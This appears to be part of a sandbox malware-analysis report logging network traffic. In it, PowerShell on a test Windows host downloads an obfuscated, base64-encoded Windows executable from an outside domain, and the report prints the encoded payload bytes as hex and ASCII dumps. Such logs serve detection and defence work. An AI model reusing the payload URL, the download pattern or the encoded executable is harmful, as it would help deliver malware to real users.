                                                                                                                                          2024-09-30 16:58:36 UTC747INData Raw: 37 64 33 30 0d 0a 54 56 71 51 41 5e 41 4d 41 41 41 5e 41 45 41 41 41 5e 41 2f 2f 38 41 5e 41 4c 67 41 41 5e 41 41 41 41 41 5e 41 41 51 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 67 41 41 41 41 5e 41 34 66 75 67 5e 34 41 74 41 6e 5e 4e 49 62 67 42 5e 54 4d 30 68 56 5e 47 68 70 63 79 5e 42 77 63 6d 39 5e 6e 63 6d 46 74 5e 49 47 4e 68 62 5e 6d 35 76 64 43 5e 42 69 5a 53 42 5e 79 64 57 34 67 5e 61 57 34 67 52 5e 45 39 54 49 47 5e 31 76 5a 47 55 5e 75 44 51 30 4b 5e 4a 41 41 41 41 5e 41 41 41 41 41 5e 42 51 52 51 41 5e 41 54 41 45 44 5e 41 45 6d 6b 38 5e 6d 59 41 41 41 5e 41 41 41 41 41 5e 41 41 4f 41 41 5e 44 69 45 4c 41 5e 54 41 41
                                                                                                                                          Data Ascii: 7d30TVqQA^AMAAA^AEAAA^A//8A^ALgAA^AAAAA^AAQAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^gAAAA^A4fug^4AtAn^NIbgB^TM0hV^Ghpcy^Bwcm9^ncmFt^IGNhb^m5vdC^BiZSB^ydW4g^aW4gR^E9TIG^1vZGU^uDQ0K^JAAAA^AAAAA^BQRQA^ATAED^AEmk8^mYAAA^AAAAA^AAOAA^DiELA^TAA
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 4d 5e 41 41 41 41 41 5e 45 41 49 41 41 5e 41 43 41 41 41 5e 41 37 67 63 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 51 41 41 41 5e 51 67 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 43 41 42 5e 67 67 41 41 41 5e 41 41 41 45 67 5e 41 41 41 41 43 5e 41 41 55 41 6d 5e 45 55 46 41 4e 5e 68 49 41 67 41 5e 42 41 41 41 41 5e 41 41 41 41 41 5e 48 43 4f 42 77 5e 42 6e 64 41 41 5e 41 6a 51 55 49 5e 41 49 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 42 5e 4d 77 41 77 41 5e 46 41 51 41 41 5e 41 51 41 41 45 5e 53 73 46 4b 4f 5e 6a 4e 4a 57 41 5e 67 41 67 41 41 5e 41 50 34 4f 41 5e 41 41 34 41 41 5e
                                                                                                                                          Data Ascii: AM^AAAAA^EAIAA^ACAAA^A7gcA^AAAAA^AAAAA^AAAAA^AQAAA^QgAAA^AAAAA^AAAAA^AAAAA^AACAB^ggAAA^AAAEg^AAAAC^AAUAm^EUFAN^hIAgA^BAAAA^AAAAA^HCOBw^BndAA^AjQUI^AIAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAB^MwAwA^FAQAA^AQAAE^SsFKO^jNJWA^gAgAA^AP4OA^AA4AA^
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 5e 42 69 55 6d 67 5e 41 51 41 41 41 5e 51 67 42 67 41 5e 41 41 44 67 7a 5e 2f 2f 2f 2f 49 5e 49 77 41 41 41 5e 41 6f 45 51 41 5e 41 42 69 55 6d 5e 67 41 59 41 41 5e 41 51 67 42 41 5e 41 41 41 44 67 5e 59 2f 2f 2f 2f 5e 66 6d 63 43 41 5e 41 51 6f 42 41 5e 67 41 42 69 55 5e 6d 49 4b 4d 41 5e 41 41 41 6f 45 5e 51 41 41 42 69 5e 55 6d 66 6d 67 5e 43 41 41 51 6f 5e 43 41 67 41 42 5e 69 68 67 41 67 5e 41 47 66 6d 6b 5e 43 41 41 51 6f 5e 44 41 67 41 42 5e 69 55 6d 49 4b 5e 59 41 41 41 41 5e 6f 45 51 41 41 5e 42 69 43 70 41 5e 41 41 41 4b 42 5e 45 41 41 41 59 5e 6c 4a 6e 35 71 5e 41 67 41 45 4b 5e 42 41 49 41 41 5e 61 41 42 77 41 5e 41 42 43 41 41 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 47 51 49 5e 41 42 44 6d 73 5e 2f 76 2f 2f 4a 5e 69 41 41 41 41 5e 41
                                                                                                                                          Data Ascii: A^BiUmg^AQAAA^QgBgA^AADgz^////I^IwAAA^AoEQA^ABiUm^gAYAA^AQgBA^AAADg^Y////^fmcCA^AQoBA^gABiU^mIKMA^AAAoE^QAABi^Umfmg^CAAQo^CAgAB^ihgAg^AGfmk^CAAQo^DAgAB^iUmIK^YAAAA^oEQAA^BiCpA^AAAKB^EAAAY^lJn5q^AgAEK^BAIAA^aABwA^ABCAA^AAAAf^gYCAA^R7GQI^ABDms^/v//J^iAAAA^A
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 5e 41 46 38 41 41 5e 41 41 46 41 41 5e 41 41 65 67 41 5e 41 41 42 59 41 5e 41 41 41 34 57 5e 67 41 41 41 48 5e 4d 53 41 41 41 5e 4b 45 77 49 67 5e 41 67 41 41 41 5e 44 6a 56 2f 2f 5e 2f 2f 45 51 41 5e 52 41 48 35 76 5e 41 67 41 45 4b 5e 43 51 49 41 41 5e 59 6c 4a 68 45 5e 41 66 6e 41 43 5e 41 41 51 6f 4b 5e 41 67 41 42 69 5e 55 6d 66 6e 45 5e 43 41 41 51 6f 5e 4c 41 67 41 42 5e 68 4d 4a 49 41 5e 45 41 41 41 42 5e 2b 42 67 49 41 5e 42 48 73 65 41 5e 67 41 45 4f 5a 5e 66 2f 2f 2f 38 5e 6d 49 41 45 41 5e 41 41 41 34 6a 5e 50 2f 2f 2f 78 5e 45 41 66 67 73 5e 41 41 41 52 2b 5e 62 67 49 41 42 5e 43 67 67 43 41 5e 41 47 49 41 4d 5e 41 41 41 41 34 5e 63 66 2f 2f 2f 5e 77 41 52 41 68 5e 45 4a 46 69 69 5e 66 41 51 41 47 5e 63 78 4d 41 41 5e 41 6f 54 43 69 5e 41 43
                                                                                                                                          Data Ascii: ^AF8AA^AAFAA^AAegA^AABYA^AAA4W^gAAAH^MSAAA^KEwIg^AgAAA^DjV//^//EQA^RAH5v^AgAEK^CQIAA^YlJhE^AfnAC^AAQoK^AgABi^UmfnE^CAAQo^LAgAB^hMJIA^EAAAB^+BgIA^BHseA^gAEOZ^f///8^mIAEA^AAA4j^P///x^EAfgs^AAAR+^bgIAB^CggCA^AGIAM^AAAA4^cf///^wARAh^EJFii^fAQAG^cxMAA^AoTCi^AC
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 41 41 41 4a 5e 69 41 41 41 41 5e 41 41 4f 41 51 5e 41 41 41 44 2b 5e 44 41 34 41 52 5e 51 4d 41 41 41 5e 41 46 41 41 41 5e 41 47 77 41 41 5e 41 45 51 41 41 5e 41 41 34 41 41 5e 41 41 41 42 45 5e 41 66 6e 4d 43 5e 41 41 51 6f 4e 5e 41 67 41 42 69 5e 41 43 41 41 41 5e 41 4f 4e 54 2f 5e 2f 2f 38 62 52 5e 51 45 41 41 41 5e 44 32 2f 2f 2f 5e 2f 49 41 41 41 5e 41 41 42 2b 42 5e 67 49 41 42 48 5e 73 53 41 67 41 5e 45 4f 62 62 2f 5e 2f 2f 38 6d 49 5e 41 41 41 41 41 5e 41 34 71 2f 2f 5e 2f 2f 39 77 67 5e 41 41 41 41 41 5e 48 34 47 41 67 5e 41 45 65 79 67 5e 43 41 41 51 35 5e 32 2f 76 2f 2f 5e 79 59 67 41 41 5e 41 41 41 44 6a 5e 51 2b 2f 2f 2f 5e 63 78 55 41 41 5e 41 6f 54 41 43 5e 41 42 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 4a 5e 67 49 41 42 44 5e 71 31 2b
                                                                                                                                          Data Ascii: AAAAJ^iAAAA^AAOAQ^AAAD+^DA4AR^QMAAA^AFAAA^AGwAA^AEQAA^AA4AA^AAABE^AfnMC^AAQoN^AgABi^ACAAA^AONT/^//8bR^QEAAA^D2///^/IAAA^AAB+B^gIABH^sSAgA^EObb/^//8mI^AAAAA^A4q//^//9wg^AAAAA^H4GAg^AEeyg^CAAQ5^2/v//^yYgAA^AAADj^Q+///^cxUAA^AoTAC^ABAAA^AfgYC^AAR7J^gIABD^q1+
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 2f 2f 2f 4a 5e 69 41 42 41 41 5e 41 41 4f 4b 33 5e 2f 2f 2f 38 63 5e 52 51 45 41 41 5e 41 44 32 2f 2f 5e 2f 2f 49 41 45 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 76 7a 41 51 5e 41 45 4f 59 2f 5e 2f 2f 2f 38 6d 5e 49 41 51 41 41 5e 41 41 34 68 50 5e 2f 2f 2f 78 45 5e 49 66 6e 4d 43 5e 41 41 51 6f 4e 5e 41 67 41 42 69 5e 41 44 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 43 5e 41 49 41 42 44 5e 70 6b 2f 2f 2f 5e 2f 4a 69 41 43 5e 41 41 41 41 4f 5e 46 6e 2f 2f 2f 5e 2f 63 45 51 4d 5e 36 53 41 41 41 5e 41 43 41 43 41 5e 41 41 41 4f 41 5e 51 41 41 41 44 5e 2b 44 41 6f 41 5e 52 51 4d 41 41 5e 41 41 70 41 41 5e 41 41 56 41 41 5e 41 41 41 55 41 5e 41 41 41 34 4a 5e 41 41 41 41 44 5e 68 4b 41 41 41 5e 41 49 41 41 41 5e 41 41 42 2b 42 5e 67 49 41 42 48 5e 76 2f 41 51
                                                                                                                                          Data Ascii: ///J^iABAA^AAOK3^///8c^RQEAA^AD2//^//IAE^AAAB+^BgIAB^HvzAQ^AEOY/^///8m^IAQAA^AA4hP^///xE^IfnMC^AAQoN^AgABi^ADAAA^AfgYC^AAR7C^AIABD^pk///^/JiAC^AAAAO^Fn///^/cEQM^6SAAA^ACACA^AAAOA^QAAAD^+DAoA^RQMAA^AApAA^AAVAA^AAAUA^AAA4J^AAAAD^hKAAA^AIAAA^AAB+B^gIABH^v/AQ
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 41 41 5e 69 67 59 41 41 5e 41 4b 49 41 41 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 74 45 41 67 5e 41 45 4f 52 51 5e 41 41 41 41 6d 5e 49 41 41 41 41 5e 41 41 34 43 51 5e 41 41 41 44 6a 5e 43 2f 2f 2f 2f 5e 2f 67 77 41 41 5e 45 55 43 41 41 5e 41 41 42 51 41 5e 41 41 43 73 41 5e 41 41 41 34 41 5e 41 41 41 41 41 5e 49 44 66 51 30 5e 41 41 41 51 67 5e 41 51 41 41 41 5e 48 34 47 41 67 5e 41 45 65 78 77 5e 43 41 41 51 35 5e 30 2f 2f 2f 2f 5e 79 59 67 41 51 5e 41 41 41 44 6a 5e 49 2f 2f 2f 2f 5e 4b 67 41 41 4f 5e 69 73 46 4b 47 5e 47 58 56 30 63 5e 43 65 77 30 41 5e 41 41 51 71 41 5e 44 59 72 42 53 5e 68 77 2f 32 46 5e 50 4b 43 63 41 5e 41 41 59 71 41 5e 41 41 36 4b 77 5e 55 6f 6e 51 39 5e 5a 53 51 41 6f 5e 70 41 4d 41 42 5e 69 6f 41 51 69 5e 73 46 4b 48 51
                                                                                                                                          Data Ascii: AAA^igYAA^AKIAA^AAAB+^BgIAB^HtEAg^AEORQ^AAAAm^IAAAA^AA4CQ^AAADj^C////^/gwAA^EUCAA^AABQA^AACsA^AAA4A^AAAAA^IDfQ0^AAAQg^AQAAA^H4GAg^AEexw^CAAQ5^0////^yYgAQ^AAADj^I////^KgAAO^isFKG^GXV0c^Cew0A^AAQqA^DYrBS^hw/2F^PKCcA^AAYqA^AA6Kw^UonQ9^ZSQAo^pAMAB^ioAQi^sFKHQ
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 4f 5e 48 37 2f 2f 2f 5e 38 52 41 43 67 5e 77 41 41 41 47 5e 4a 53 59 54 41 5e 53 41 46 41 41 5e 41 41 66 67 59 5e 43 41 41 52 37 5e 4b 51 49 41 42 5e 44 70 66 2f 2f 5e 2f 2f 4a 69 41 5e 46 41 41 41 41 5e 4f 46 54 2f 2f 5e 2f 38 62 52 51 5e 45 41 41 41 44 5e 32 2f 2f 2f 2f 5e 49 41 41 41 41 5e 41 42 2b 42 67 5e 49 41 42 48 74 5e 67 41 67 41 45 5e 4f 54 62 2f 2f 5e 2f 38 6d 49 41 5e 41 41 41 41 41 5e 34 4b 2f 2f 2f 5e 2f 78 45 41 45 5e 51 46 2b 67 41 5e 49 41 42 43 68 5e 6f 43 41 41 47 5e 4a 53 59 54 42 5e 43 41 43 41 41 5e 41 41 2f 67 34 5e 43 41 44 67 48 5e 2f 2f 2f 2f 30 5e 43 73 41 41 41 5e 59 6d 49 41 59 5e 41 41 41 41 34 5e 2b 2f 37 2f 2f 5e 7a 6a 4c 2f 2f 5e 2f 2f 49 41 41 5e 41 41 41 42 2b 5e 42 67 49 41 42 5e 48 74 6c 41 67 5e 41 45 4f 75 4c 5e
                                                                                                                                          Data Ascii: AO^H7///^8RACg^wAAAG^JSYTA^SAFAA^AAfgY^CAAR7^KQIAB^Dpf//^//JiA^FAAAA^OFT//^/8bRQ^EAAAD^2////^IAAAA^AB+Bg^IABHt^gAgAE^OTb//^/8mIA^AAAAA^4K///^/xEAE^QF+gA^IABCh^oCAAG^JSYTB^CACAA^AA/g4^CADgH^////0^CsAAA^YmIAY^AAAA4^+/7//^zjL//^//IAA^AAAB+^BgIAB^HtlAg^AEOuL^
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 41 5e 41 41 47 4a 53 5e 59 36 58 41 45 5e 41 41 43 41 41 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 44 51 49 5e 41 42 44 6c 53 5e 2f 2f 2f 2f 4a 5e 69 41 42 41 41 5e 41 41 4f 45 66 5e 2f 2f 2f 38 34 5e 35 51 41 41 41 5e 43 41 41 41 41 5e 41 41 66 67 59 5e 43 41 41 52 37 5e 43 67 49 41 42 5e 44 6b 75 2f 2f 5e 2f 2f 4a 69 41 5e 41 41 41 41 41 5e 4f 43 50 2f 2f 5e 2f 2f 64 65 50 5e 2f 2f 2f 79 41 5e 46 41 41 41 41 5e 4f 42 54 2f 2f 5e 2f 38 63 52 51 5e 45 41 41 41 44 5e 32 2f 2f 2f 2f 5e 49 41 51 41 41 5e 41 42 2b 42 67 5e 49 41 42 48 74 5e 66 41 67 41 45 5e 4f 66 62 2b 2f 5e 2f 38 6d 49 41 5e 6f 41 41 41 41 5e 34 36 2f 37 2f 5e 2f 78 45 44 46 5e 31 67 54 41 79 5e 41 4e 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 2b 5e 51 45 41 42 44 5e 6e 52 2f 76 2f 5e 2f
                                                                                                                                          Data Ascii: A^AAGJS^Y6XAE^AACAA^AAAAf^gYCAA^R7DQI^ABDlS^////J^iABAA^AAOEf^///84^5QAAA^CAAAA^AAfgY^CAAR7^CgIAB^Dku//^//JiA^AAAAA^OCP//^//deP^///yA^FAAAA^OBT//^/8cRQ^EAAAD^2////^IAQAA^AB+Bg^IABHt^fAgAE^Ofb+/^/8mIA^oAAAA^46/7/^/xEDF^1gTAy^ANAAA^AfgYC^AAR7+^QEABD^nR/v/^/
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 5e 44 72 54 2f 2f 5e 2f 2f 4a 69 41 5e 41 41 41 41 41 5e 4f 4d 6a 2f 2f 5e 2f 38 71 41 41 5e 41 54 4d 41 51 5e 41 36 41 41 41 5e 41 41 67 41 41 5e 42 45 72 42 53 5e 69 42 63 68 51 5e 37 49 41 49 41 5e 41 41 44 2b 44 5e 67 45 41 4f 41 5e 41 41 41 41 44 5e 2b 44 41 45 41 5e 52 51 55 41 41 5e 41 41 46 41 41 5e 41 41 6a 77 41 5e 41 41 45 6b 41 5e 41 41 42 37 41 5e 41 41 41 48 41 5e 41 41 41 44 67 5e 41 41 41 41 41 5e 45 67 41 65 4b 5e 45 4d 41 41 41 5e 5a 39 46 77 41 5e 41 42 43 41 45 5e 41 41 41 41 4f 5e 4d 76 2f 2f 2f 5e 38 53 41 48 77 5e 59 41 41 41 45 5e 45 67 41 6f 41 5e 51 41 41 4b 79 5e 41 44 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 37 5e 51 45 41 42 44 5e 6d 70 2f 2f 2f 5e 2f 4a 69 41 43 5e 41 41 41 41 4f 5e 4a 37 2f 2f 2f 5e 38 53 41 48 36 5e 47 41
                                                                                                                                          Data Ascii: ^DrT//^//JiA^AAAAA^OMj//^/8qAA^ATMAQ^A6AAA^AAgAA^BErBS^iBchQ^7IAIA^AAD+D^gEAOA^AAAAD^+DAEA^RQUAA^AAFAA^AAjwA^AAEkA^AAB7A^AAAHA^AAADg^AAAAA^EgAeK^EMAAA^Z9FwA^ABCAE^AAAAO^Mv///^8SAHw^YAAAE^EgAoA^QAAKy^ADAAA^AfgYC^AAR77^QEABD^mp///^/JiAC^AAAAO^J7///^8SAH6^GA


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.549759104.21.92.1894439064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-09-30 16:58:36 UTC177OUTGET /file/res/ HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                          Host: drive.desktopserver.top
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-09-30 16:58:36 UTC626INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 30 Sep 2024 16:58:36 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eNc0GEGHP0ArakvJQ4tEADiW4xs5BWlooFQuC2ASyPNBrlEUAPGEe9kyktmbKlFpQ0hQMKM%2FZhRpfTO%2B%2FnRVipXTVsUptoKHtA7JEWp8lsdjTscIBt2pfsw9z3eytove2%2FHma9Tv4tYqsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8cb5c237d8f1de93-EWR
                                                                                                                                          2024-09-30 16:58:36 UTC743INData Raw: 38 66 64 0d 0a 54 56 71 51 41 5e 41 4d 41 41 41 5e 41 45 41 41 41 5e 41 2f 2f 38 41 5e 41 4c 67 41 41 5e 41 41 41 41 41 5e 41 41 51 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 67 41 41 41 41 5e 41 34 66 75 67 5e 34 41 74 41 6e 5e 4e 49 62 67 42 5e 54 4d 30 68 56 5e 47 68 70 63 79 5e 42 77 63 6d 39 5e 6e 63 6d 46 74 5e 49 47 4e 68 62 5e 6d 35 76 64 43 5e 42 69 5a 53 42 5e 79 64 57 34 67 5e 61 57 34 67 52 5e 45 39 54 49 47 5e 31 76 5a 47 55 5e 75 44 51 30 4b 5e 4a 41 41 41 41 5e 41 41 41 41 41 5e 42 51 52 51 41 5e 41 54 41 45 44 5e 41 45 6d 6b 38 5e 6d 59 41 41 41 5e 41 41 41 41 41 5e 41 41 4f 41 41 5e 44 69 45 4c 41 5e 54 41 41 41
                                                                                                                                          Data Ascii: 8fdTVqQA^AMAAA^AEAAA^A//8A^ALgAA^AAAAA^AAQAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^gAAAA^A4fug^4AtAn^NIbgB^TM0hV^Ghpcy^Bwcm9^ncmFt^IGNhb^m5vdC^BiZSB^ydW4g^aW4gR^E9TIG^1vZGU^uDQ0K^JAAAA^AAAAA^BQRQA^ATAED^AEmk8^mYAAA^AAAAA^AAOAA^DiELA^TAAA
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 6a 41 41 41 4d 5e 41 41 41 41 41 5e 45 41 49 41 41 5e 41 43 41 41 41 5e 41 37 67 63 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 51 41 41 41 5e 51 67 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 43 41 42 5e 67 67 41 41 41 5e 41 41 41 45 67 5e 41 41 41 41 43 5e 41 41 55 41 6d 5e 45 55 46 41 4e 5e 68 49 41 67 41 5e 42 41 41 41 41 5e 41 41 41 41 41 5e 48 43 4f 42 77 5e 42 6e 64 41 41 5e 41 6a 51 55 49 5e 41 49 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 41 41 41 41 42 5e 4d 77 41 77 41 5e 46 41 51 41 41 5e 41 51 41 41 45 5e 53 73 46 4b 4f 5e 6a 4e 4a 57 41 5e 67 41 67 41 41 5e 41 50 34 4f 41 5e 41 41 34
                                                                                                                                          Data Ascii: jAAAM^AAAAA^EAIAA^ACAAA^A7gcA^AAAAA^AAAAA^AAAAA^AQAAA^QgAAA^AAAAA^AAAAA^AAAAA^AACAB^ggAAA^AAAEg^AAAAC^AAUAm^EUFAN^hIAgA^BAAAA^AAAAA^HCOBw^BndAA^AjQUI^AIAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAA^AAAAB^MwAwA^FAQAA^AQAAE^SsFKO^jNJWA^gAgAA^AP4OA^AA4
                                                                                                                                          2024-09-30 16:58:36 UTC196INData Raw: 71 77 45 41 5e 42 69 55 6d 67 5e 41 51 41 41 41 5e 51 67 42 67 41 5e 41 41 44 67 7a 5e 2f 2f 2f 2f 49 5e 49 77 41 41 41 5e 41 6f 45 51 41 5e 41 42 69 55 6d 5e 67 41 59 41 41 5e 41 51 67 42 41 5e 41 41 41 44 67 5e 59 2f 2f 2f 2f 5e 66 6d 63 43 41 5e 41 51 6f 42 41 5e 67 41 42 69 55 5e 6d 49 4b 4d 41 5e 41 41 41 6f 45 5e 51 41 41 42 69 5e 55 6d 66 6d 67 5e 43 41 41 51 6f 5e 43 41 67 41 42 5e 69 68 67 41 67 5e 41 47 66 6d 6b 5e 43 41 41 51 6f 5e 44 41 67 41 42 5e 69 55 6d 49 4b 5e 59 41 41 41 41 5e 6f 45 51 41 41 5e 42 69 43 70 41 5e 41 41 41 4b 42 5e 45 41 41 41 59 5e 6c 4a 6e 0d 0a
                                                                                                                                          Data Ascii: qwEA^BiUmg^AQAAA^QgBgA^AADgz^////I^IwAAA^AoEQA^ABiUm^gAYAA^AQgBA^AAADg^Y////^fmcCA^AQoBA^gABiU^mIKMA^AAAoE^QAABi^Umfmg^CAAQo^CAgAB^ihgAg^AGfmk^CAAQo^DAgAB^iUmIK^YAAAA^oEQAA^BiCpA^AAAKB^EAAAY^lJn
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 37 39 35 38 0d 0a 35 71 5e 41 67 41 45 4b 5e 42 41 49 41 41 5e 61 41 42 77 41 5e 41 42 43 41 41 5e 41 41 41 41 66 5e 67 59 43 41 41 5e 52 37 47 51 49 5e 41 42 44 6d 73 5e 2f 76 2f 2f 4a 5e 69 41 41 41 41 5e 41 41 4f 4b 48 5e 2b 2f 2f 38 36 5e 4b 77 55 6f 4a 5e 4b 34 67 55 51 5e 41 6f 42 77 4d 5e 41 42 69 6f 41 5e 4f 69 73 46 4b 5e 4a 59 6e 65 47 5e 41 41 4b 4b 51 5e 44 41 41 59 71 5e 41 45 49 72 42 5e 53 68 56 50 33 5e 31 45 66 67 67 5e 41 41 41 51 55 5e 2f 67 45 71 41 5e 41 41 41 4e 69 5e 73 46 4b 48 50 5e 41 66 55 70 2b 5e 43 41 41 41 42 5e 43 6f 41 41 44 5e 6f 72 42 53 67 5e 66 7a 6b 31 54 5e 41 43 67 45 41 5e 77 41 47 4b 67 5e 42 4b 4b 77 55 5e 6f 73 58 52 57 5e 51 67 44 2b 43 5e 51 41 41 4b 4b 5e 73 42 41 41 59 5e 71 41 42 4d 77 5e 41 77 42 59 41 5e
                                                                                                                                          Data Ascii: 79585q^AgAEK^BAIAA^aABwA^ABCAA^AAAAf^gYCAA^R7GQI^ABDms^/v//J^iAAAA^AAOKH^+//86^KwUoJ^K4gUQ^AoBwM^ABioA^OisFK^JYneG^AAKKQ^DAAYq^AEIrB^ShVP3^1Efgg^AAAQU^/gEqA^AAANi^sFKHP^AfUp+^CAAAB^CoAAD^orBSg^fzk1T^ACgEA^wAGKg^BKKwU^osXRW^QgD+C^QAAKK^sBAAY^qABMw^AwBYA^
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 73 5e 41 41 41 52 2b 5e 62 67 49 41 42 5e 43 67 67 43 41 5e 41 47 49 41 4d 5e 41 41 41 41 34 5e 63 66 2f 2f 2f 5e 77 41 52 41 68 5e 45 4a 46 69 69 5e 66 41 51 41 47 5e 63 78 4d 41 41 5e 41 6f 54 43 69 5e 41 43 41 41 41 5e 41 4f 41 51 41 5e 41 41 44 2b 44 5e 41 63 41 52 51 5e 4d 41 41 41 41 5e 57 41 67 41 41 5e 33 51 45 41 41 5e 41 55 41 41 41 5e 41 34 45 51 49 5e 41 41 41 41 52 5e 43 6e 4d 55 41 5e 41 41 4b 45 77 5e 77 67 41 41 41 5e 41 41 48 34 47 5e 41 67 41 45 65 5e 30 77 43 41 41 5e 51 36 44 77 41 5e 41 41 43 59 67 5e 41 41 41 41 41 5e 44 67 45 41 41 5e 41 41 2f 67 77 5e 42 41 45 55 42 5e 41 41 41 41 42 5e 51 41 41 41 44 5e 67 41 41 41 41 5e 41 41 42 45 4d 5e 41 6e 35 79 41 5e 67 41 45 4b 44 5e 41 49 41 41 59 5e 67 41 41 41 41 5e 41 48 34 47 41 5e 67
                                                                                                                                          Data Ascii: s^AAAR+^bgIAB^CggCA^AGIAM^AAAA4^cf///^wARAh^EJFii^fAQAG^cxMAA^AoTCi^ACAAA^AOAQA^AAD+D^AcARQ^MAAAA^WAgAA^3QEAA^AUAAA^A4EQI^AAAAR^CnMUA^AAKEw^wgAAA^AAH4G^AgAEe^0wCAA^Q6DwA^AACYg^AAAAA^DgEAA^AA/gw^BAEUB^AAAAB^QAAAD^gAAAA^AABEM^An5yA^gAEKD^AIAAY^gAAAA^AH4GA^g
                                                                                                                                          2024-09-30 16:58:36 UTC1369INData Raw: 5e 43 41 41 51 35 5e 32 2f 76 2f 2f 5e 79 59 67 41 41 5e 41 41 41 44 6a 5e 51 2b 2f 2f 2f 5e 63 78 55 41 41 5e 41 6f 54 41 43 5e 41 42 41 41 41 5e 41 66 67 59 43 5e 41 41 52 37 4a 5e 67 49 41 42 44 5e 71 31 2b 2f 2f 5e 2f 4a 69 41 42 5e 41 41 41 41 4f 5e 4b 72 37 2f 2f 5e 38 41 51 57 51 5e 41 41 41 49 41 5e 41 41 42 6f 41 5e 51 41 41 51 77 5e 41 41 41 4b 73 5e 42 41 41 44 53 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 49 41 41 41 41 5e 74 41 51 41 41 5e 55 41 45 41 41 5e 48 30 43 41 41 5e 42 6f 41 41 41 5e 41 41 41 41 41 5e 41 41 49 41 41 5e 41 44 33 41 41 5e 41 41 53 77 49 5e 41 41 45 49 44 5e 41 41 42 6f 41 5e 41 41 41 41 41 5e 41 41 41 41 49 5e 41 41 41 41 7a 5e 41 41 41 41 64 5e 77 4d 41 41 4b 5e 6f 44 41 41 43 5e 41 41 41 41 41 5e 41 41 41 41 41 5e 42 73
                                                                                                                                          Data Ascii: ^CAAQ5^2/v//^yYgAA^AAADj^Q+///^cxUAA^AoTAC^ABAAA^AfgYC^AAR7J^gIABD^q1+//^/JiAB^AAAAO^Kr7//^8AQWQ^AAAIA^AABoA^QAAQw^AAAKs^BAADS^AAAAA^AAAAA^IAAAA^tAQAA^UAEAA^H0CAA^BoAAA^AAAAA^AAIAA^AD3AA^AASwI^AAEID^AABoA^AAAAA^AAAAI^AAAAz^AAAAd^wMAAK^oDAAC^AAAAA^AAAAA^Bs
